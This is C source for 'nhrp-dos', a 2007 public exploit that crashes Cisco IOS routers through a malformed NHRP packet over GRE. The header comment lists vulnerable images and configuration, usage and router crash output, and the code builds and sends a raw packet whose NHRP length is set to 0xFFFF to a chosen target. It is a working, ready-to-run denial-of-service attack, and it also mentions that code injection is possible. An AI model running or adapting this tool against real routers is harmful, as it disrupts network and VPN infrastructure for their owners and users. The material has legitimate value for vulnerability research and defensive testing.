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/******************************************************************************/ /* */ /* nhrp-dos - Copyright by Martin Kluge, <mk@elxsi.de> */ /* */ /* Feel free to modify this code as you like, as long as you include the */ /* above copyright statement. */ /* */ /* Please use this code only to check your OWN cisco routers. */ /* */ /* Cisco bug ID: CSCin95836 */ /* */ /* The Next-Hop-Resolution Protocol (NHRP) is defined in RFC2332. It is used */ /* by a source host/router connected to a Non-Broadcast-Multi-Access (NBMA) */ /* subnetwork to determine the internetworking layer address and NBMA */ /* subnetwork addresses of the NBMA next hop towards the destination. */ /* NHRP is often used for dynamic multipoint VPNs (DMVPN) in combination with */ /* IPSEC. */ /* */ /* URLs: */ /* - [RFC2332/NHRP] http://rfc.net/rfc2332.html */ /* - [RFC1701/GRE] http://rfc.net/rfc1701.html */ /* - [DMVPNs with Cisco] http://www.cisco.com/en/US/tech/tk583/tk372/techno */ /* logies_white_paper09186a008018983e.shtml */ /* */ /* This code was only tested on FreeBSD and Linux, no warranty is or will be */ /* provided. */ /* */ /* Vulnerable images (tested): */ /* */ /* - c7100-jk9o3s-mz.123-12e.bin */ /* - c7200-jk8o3s-mz.122-40.bin */ /* - c3640-js-mz.122-15.T17.bin */ /* (and many other IOS versions on different platforms) */ /* */ /* Vulnerable configuration on cisco IOS: */ /* */ /* interface Tunnel0 */ /* ip address 10.0.0.1 255.255.255.128 */ /* no ip redirects */ /* no ip proxy-arp */ /* ip mtu 1464 */ /* ip nhrp authentication mysecret */ /* ip nhrp network-id 1000 */ /* ip nhrp map multicast dynamic */ /* ip nhrp server-only */ /* ip nhrp holdtime 30 */ /* tunnel source FastEthernet0/0 */ /* tunnel mode gre multipoint */ /* tunnel key 123456789 */ /* */ /* This exploit works even if "ip nhrp authentication" is configured on the */ /* cisco router. You can also specify a GRE key (use 0 to disable this */ /* feature) if the GRE tunnel is protected. You don't need to know the */ /* NHRP network id (or any other configuration details, except the GRE key if */ /* it is set on the target router). */ /* */ /* NOTE: The exploit only seems to work, if a NHRP session between the target */ /* router and at least one client is established. */ /* */ /* Code injection is also possible (thanks to sky for pointing this out), but */ /* it is not very easy and depends heavily on the IOS version / platform. */ /* */ /* Example: */ /* root@elxsi# ./nhrp-dos vr0 x.x.x.x 123456789 */ /* */ /* Router console output: */ /* */ /* -Traceback= 605D89A0 605D6B50 605BD974 605C08CC 605C2598 605C27E8 */ /* $0 : 00000000, AT : 62530000, v0 : 62740000, v1 : 62740000 */ /* <snip> */ /* EPC : 605D89A0, ErrorEPC : BFC01654, SREG : 3400FF03 */ /* Cause 00000024 (Code 0x9): Breakpoint exception */ /* */ /* Writing crashinfo to bootflash:crashinfo_20070321-155011 */ /* === Flushing messages (16:50:12 CET Wed Mar 21 2007) === */ /* */ /* Router reboots or sometimes hangs ;) */ /* */ /* */ /* Workaround: Disable NHRP ;) */ /* */ /* I'd like to thank the Cisco PSIRT and Clay Seaman-Kossmey for their help */ /* regarding this issue. */ /* */ /* Greetings fly to: sky, chilli, arbon, ripp, huega, gh0st, argonius, s0uls, */ /* xhr, bullet, nanoc, spekul, kaner, d, slobo, conny, H-Ra */ /* and #infiniteVOID */ /* */ /******************************************************************************/
#include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <netdb.h> #include <arpa/inet.h> #include <sys/socket.h> #include <sys/ioctl.h> #include <net/if.h> #include <netinet/in.h> #include <netinet/in_systm.h> #include <netinet/ip.h>
/* BSD */ #define _BSD
/* Header sizes */ #define IP_HDR_SIZE 20 #define GRE_HDR_SIZE 4 #define GRE_KEY_SIZE 4 #define NHRP_HDR_SIZE 62
/* Function prototypes */ int open_socket (void); int close_socket (int); int send_dos(int, unsigned long, unsigned long, unsigned long); unsigned long resolve_ip (char *); unsigned long get_int_ipv4 (char *);
/* Globals */ int sockfd; int nhrp_req_id;
/* GRE header */ struct gre_h { unsigned short flags; /* GRE flags */ unsigned short ptype; /* GRE protocol type */ unsigned int key; /* GRE key */ };
/* NHRP header */ struct nhrp_h { /* NHRP fixed header (20 bytes) */ struct { unsigned short afn; /* NHRP AFN */ unsigned short proto; /* NHRP protocol type */ unsigned int snap; /* NHRP SNAP */ unsigned short snapE:8; /* NHRP SNAP */ unsigned short hops:8; /* NHRP hop count */ unsigned short length; /* NHRP total length */ unsigned short checksum; /* NHRP checksum */ unsigned short mpoa_ext; /* NHRP MPOA extensions */ unsigned short version:8; /* NHRP version */ unsigned short type:8; /* NHRP type */ unsigned short nbma_addr:8; /* NHRP t/l of NBMA address */ unsigned short nbma_sub:8; /* NHRP t/l of NBMA subaddr */ } fixed;
/* NHRP mandatory part */ struct { unsigned short src_len:8; /* NHRP src protocol length */ unsigned short dst_len:8; /* NHRP dest protocol length */ unsigned short flags; /* NHRP flags */ unsigned int request_id; /* NHRP request ID */ unsigned long client_nbma; /* NHRP client NBMA address */ unsigned long client_nbma_sub; /* NHRP client NBMA subaddr */ unsigned long client_pro_addr; /* NHRP client protocol addr */ } mand;
/* NHRP client information entries (CIE) */ union { struct { unsigned short code:8; /* NHRP code */ unsigned short pref_len:8; /* NHRP prefix length */ unsigned short reserved; /* NHRP reserved */ unsigned short mtu; /* NHRP MTU */ unsigned short holding_time; /* NHRP holding time */ unsigned short len_client:8; /* NHRP t/l cl addr */ unsigned short len_client_sub:8;/* NHRP t/l cl sub */ unsigned short len_client_pro:8;/* NHRP t/l cl pro */ unsigned short preference:8; /* NHRP preference */ unsigned short ext; /* NHRP extension */ } cie; }; };
/* Main function */ int main (int argc, char **argv) { /* Check command line */ if(argc != 4) { fprintf(stderr, "\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n"); fprintf(stderr, "------------------------------------------------\n"); fprintf(stderr, "Usage: ./nhrp-dos <device> <target> <GRE key>\n"); fprintf(stderr, "(Set GRE key = 0 to disable GRE keys!)\n\n"); exit(EXIT_FAILURE); }
/* Check UID */ if(getuid() != 0 && geteuid() != 0) { fprintf(stderr, "Error: Please run as root!\n"); exit(EXIT_FAILURE); }
/* Open a socket */ sockfd = open_socket();
/* Send DoS packet */ send_dos(sockfd, get_int_ipv4(argv[1]), resolve_ip(argv[2]), atoi(argv[3]));
/* Close the socket */ close_socket(sockfd); exit(EXIT_SUCCESS); }
/* Open the socket */ int open_socket (void) { int fd; int one = 1; void *ptr = &one;
/* Open the socket */ fd = socket(AF_INET, SOCK_RAW, IPPROTO_UDP); if(fd < 0) { fprintf(stderr, "Error: open_socket: Unable to open socket.\n"); exit(EXIT_FAILURE); }
/* Set IP_HDRINCL to include the IPv4 header in outgoing packets. */ /* Otherwise it would be done by the kernel. */ if(setsockopt(fd, IPPROTO_IP, IP_HDRINCL, ptr, sizeof(one)) < 0) { fprintf(stderr, "Error: open_socket: setsockopt failed.\n"); exit(EXIT_FAILURE); }
#ifndef _BSD if(setsockopt(fd, IPPROTO_IP, SO_BROADCAST, ptr, sizeof(one)) < 0) { fprintf(stderr,"Error: open_socket: setsockopt failed.\n"); exit(EXIT_FAILURE); } #endif
return(fd); }
/* Close the socket */ int close_socket (int fd) { return(close(fd)); }
/* Resolve the hostname to IP address */ unsigned long resolve_ip (char *host) { struct in_addr addr; struct hostent *host_ent;
if((addr.s_addr = inet_addr(host)) == -1) { if(!(host_ent = gethostbyname(host))) return(-1);
memcpy((char *)&addr.s_addr, host_ent->h_addr, host_ent->h_length); }
return(addr.s_addr); }
/* Get IPv4 address of DEVICE */ unsigned long get_int_ipv4 (char *device) { int tmp_fd; struct ifreq ifr; struct sockaddr_in *sin;
tmp_fd = socket(PF_INET, SOCK_DGRAM, 0);
if(tmp_fd < 0) { fprintf(stderr, "Error: get_int_ipv4: socket failed.\n"); exit(EXIT_FAILURE); }
memset(&ifr, 0, sizeof(ifr)); sin = (struct sockaddr_in *) &ifr.ifr_addr; strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
ifr.ifr_addr.sa_family = AF_INET;
if(ioctl(tmp_fd, SIOCGIFADDR, (char *) &ifr) < 0) { fprintf(stderr, "Error: get_int_ipv4: ioctl failed.\n"); exit(EXIT_FAILURE); }
close(tmp_fd); return(sin->sin_addr.s_addr); }
/* Send NHRP packet */ int send_dos (int fd, unsigned long src_ip, unsigned long dst_ip, unsigned long gre_key) { struct ip ip_hdr; struct ip *iphdr; struct gre_h gre_hdr; struct nhrp_h nhrp_hdr; struct sockaddr_in sin; unsigned int bytes = 0; int GRE_SIZE = GRE_HDR_SIZE;
/* Packet buffer */ unsigned char *buf;
if(gre_key!=0) GRE_SIZE+=GRE_KEY_SIZE;
/* Allocate some memory */ buf = malloc(IP_HDR_SIZE+GRE_SIZE+NHRP_HDR_SIZE);
if(buf < 0) { fprintf(stderr, "Error: send_dos: malloc failed.\n"); exit(EXIT_FAILURE); }
/* Increment NHRP request ID */ nhrp_req_id++;
/* IPv4 Header */ ip_hdr.ip_v = 4; /* IP version */ ip_hdr.ip_hl = 5; /* IP header length */ ip_hdr.ip_tos = 0x00; /* IP ToS */ ip_hdr.ip_len = htons(IP_HDR_SIZE + GRE_SIZE + NHRP_HDR_SIZE ); /* IP total length */ ip_hdr.ip_id = 0; /* IP identification */ ip_hdr.ip_off = 0; /* IP frag offset */ ip_hdr.ip_ttl = 64; /* IP time to live */ ip_hdr.ip_p = IPPROTO_GRE; /* IP protocol */ ip_hdr.ip_sum = 0; /* IP checksum */ ip_hdr.ip_src.s_addr = src_ip; /* IP source */ ip_hdr.ip_dst.s_addr = dst_ip; /* IP destination */
/* GRE header */ if(gre_key != 0) { gre_hdr.flags = htons(0x2000); /* GRE flags */ gre_hdr.key = htonl(gre_key); /* GRE key */ } else { gre_hdr.flags = 0; }
gre_hdr.ptype = htons(0x2001); /* GRE type (NHRP) */
/* NHRP fixed header */ nhrp_hdr.fixed.afn = htons(0x0001); /* NHRP AFN */ nhrp_hdr.fixed.proto = htons(0x0800); /* NHRP protocol type */ nhrp_hdr.fixed.snap = 0; /* NHRP SNAP */ nhrp_hdr.fixed.snapE = 0; /* NHRP SNAP */ nhrp_hdr.fixed.hops = 0xFF; /* NHRP hop count */
/* DoS -> Set length to 0xFFFF */ nhrp_hdr.fixed.length = htons(0xFFFF); /* NHRP length */
/* Checksum can be incorrect */ nhrp_hdr.fixed.checksum = 0; /* NHRP checksum */
nhrp_hdr.fixed.mpoa_ext = htons(0x0034); /* NHRP MPOA ext */ nhrp_hdr.fixed.version = 1; /* NHRP version */ nhrp_hdr.fixed.type = 3; /* NHRP type */ nhrp_hdr.fixed.nbma_addr= 4; /* NHRP NBMA t/l addr */ nhrp_hdr.fixed.nbma_sub = 0; /* NHRP NBMA t/l sub */
/* NHRP mandatory part */ nhrp_hdr.mand.src_len = 4; /* NHRP src proto len */ nhrp_hdr.mand.dst_len = 4; /* NHRP dst proto len */ nhrp_hdr.mand.flags = htons(0x8000); /* NHRP flags */ nhrp_hdr.mand.request_id = htonl(nhrp_req_id); /* NHRP request ID */ nhrp_hdr.mand.client_nbma = src_ip; /* NHRP client addr */ nhrp_hdr.mand.client_nbma_sub = 0; /* NHRP client sub */ nhrp_hdr.mand.client_pro_addr = 0; /* NHRP client proto */
/* NHRP client information entries (CIE) */ nhrp_hdr.cie.code = 0; /* NHRP code */ nhrp_hdr.cie.pref_len = 0xFF; /* NHRP prefix len */ nhrp_hdr.cie.reserved = 0x0000; /* NHRP reserved */ nhrp_hdr.cie.mtu = htons(1514); /* NHRP mtu */ nhrp_hdr.cie.holding_time = htons(30); /* NHRP holding time */ nhrp_hdr.cie.len_client = 0; /* NHRP t/l client */ nhrp_hdr.cie.len_client_sub = 0; /* NHRP t/l sub */ nhrp_hdr.cie.len_client_pro = 0; /* NHRP t/l pro */ nhrp_hdr.cie.preference = 0; /* NHRP preference */ nhrp_hdr.cie.ext = htons(0x8003); /* NHRP C/U/Type (ext)*/
/* Copy the IPv4 header to the buffer */ memcpy(buf, (unsigned char *) &ip_hdr, sizeof(ip_hdr));
/* Copy the GRE header to the buffer */ memcpy(buf + IP_HDR_SIZE, (unsigned char *) &gre_hdr, sizeof(gre_hdr));
/* Copy the NHRP header to the buffer */ memcpy(buf + IP_HDR_SIZE + GRE_SIZE, (unsigned char *) &nhrp_hdr, sizeof(nhrp_hdr));
/* Fix some BSD bugs */ #ifdef _BSD iphdr = (struct ip *) buf; iphdr->ip_len = ntohs(iphdr->ip_len); iphdr->ip_off = ntohs(iphdr->ip_off); #endif
memset(&sin, 0, sizeof(struct sockaddr_in)); sin.sin_family = AF_INET; sin.sin_addr.s_addr = iphdr->ip_dst.s_addr;
printf("\nnhrp-dos (c) by Martin Kluge <mk@elxsi.de>, 2007\n"); printf("------------------------------------------------\n"); printf("Sending DoS packet...");
/* Send the packet */ bytes = sendto(fd, buf, IP_HDR_SIZE + GRE_SIZE + NHRP_HDR_SIZE, 0, (struct sockaddr *) &sin, sizeof(struct sockaddr));
printf("DONE (%d bytes)\n\n", bytes);
/* Free the buffer */ free(buf);
/* Return number of bytes */ return(bytes); }
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